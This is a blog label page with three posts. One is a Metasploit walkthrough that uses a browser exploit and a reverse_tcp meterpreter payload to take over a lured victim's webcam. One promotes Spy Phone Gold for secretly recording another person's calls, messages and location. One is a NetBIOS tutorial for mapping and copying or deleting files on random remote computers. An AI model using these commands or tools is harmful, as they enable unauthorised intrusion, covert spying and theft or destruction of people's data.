Tampilkan postingan dengan label remote hacking. Tampilkan semua postingan
Tampilkan postingan dengan label remote hacking. Tampilkan semua postingan

Kamis, 11 Februari 2016

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

How to hack WebCam using Metasploit(Kali Linux/ Backtrack)





{How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). So today we are going to learn about How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). I will teach you how you guys can easily Hack WebCam using Metasploit(Kali Linux/ Backtrack). All you need is linux based OS and Metasploit.



Requirements:

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). Our main reason for this tutorial is to indicate exactly how simple it is, so you will take better mindfulness that it is possible, and take security and protect yourself. So lets get started: How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


Open Metasploit And write the following commands step by step :)
  • msf> show exploits
  • msf> use windows/browser/adobe_cooltype_sing
  • msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
  • payload=> windows/meterpreter/reverse_tcp
  • msf exploit(adobe_cooltype_sing) > show options

    Windows Platform Testing

  • msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
  • SRVHOST => 192.168.0.58
  • msf exploit(adobe_cooltype_sing) > set SRVPORT 80
  • SRVPORT => 80
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) >exploit -j
  • Let the victim open your IP in their (his/her)  browser and when it will be opened, you will get 1 meterpreter session.
  • msf exploit(adobe_cooltype_sing) > session -i 1
  • meterpreter> run webcam  
  • And you will get access to the webcam of the targeted victim .
  • Congratulations you did it :D !!

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)






I hope you got everything. My next tutorial will be about Using Metasploit to Hack an Android Phone. STAY CONNECTED ;)

If you have any queries fell free to comment below.


Read more

Jumat, 17 Agustus 2012

Spy Phone Gold : How To Monitor a Cellphone Record Calls Msgs Information

Most of the peoples want to know what their kids are doing on CellPhone. So in this article i will mention you some of the features of Spy Phone Gold. So in which you can secretly record their messages, calls, history, GPRS location and many more. I have mentioned many other spy softwares but this one is the best for capturing all the happening on your phone. It's a very powerful & complete program which works Invisibly on Mobile Device.

How Spy Phone Gold Works?

The Installation of Spy Phone Gold is very simple, no need for extra knowledge. Simple Follow Below Instructions.

Step1. After you purchase this software, you can directly download this program on your mobile device, and it takes approx ( 15minutes ).

Step2.
After the installation, this would secretly and invisibly records all the happening of your mobile, including Call, Messages, GPR location and many other private information.

Step3. To See the Logs of your mobile device, login to your web account and you would know what's going on in your device.


Compatibility:

BlackBerry 
Android 
Apple 
Windows Mobile 
Symbian phones

Some Features of Spy Phone Gold

1) Records Call.
2) Captures Screenshot of Mobile.
3) Records Messages.
4) GPRS Location
5) Powerful & Stealth Monitor
6) Works Invisibly.
7) Environment listening.
8) Duration of Calls
9) Sim Changing Notifications.
10) Email Logs.

Read more

Sabtu, 11 Agustus 2012

Netbios Hacking- The Ethical Hacking Tutorial


THIS NETBIOS HACKING

THIS NETBIOS HACKING IS ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

STEP 1.Open command prompt

STEP 2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:>net view \59.43.45.212

The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “59.43.45.212? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

Step 3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:>net use D: \59.43.45.212F

Example-2:
C:>net use G: \59.43.45.212SharedDocs

Example-3:
C:>net use I: \59.43.45.212Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “59.43.45.212? is the IP address of remote computer that you want to hack.

STEP 4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

[ad code=1 align=center]

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access filesfolders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

Leave Your Valuable Comments if you like this article
Read more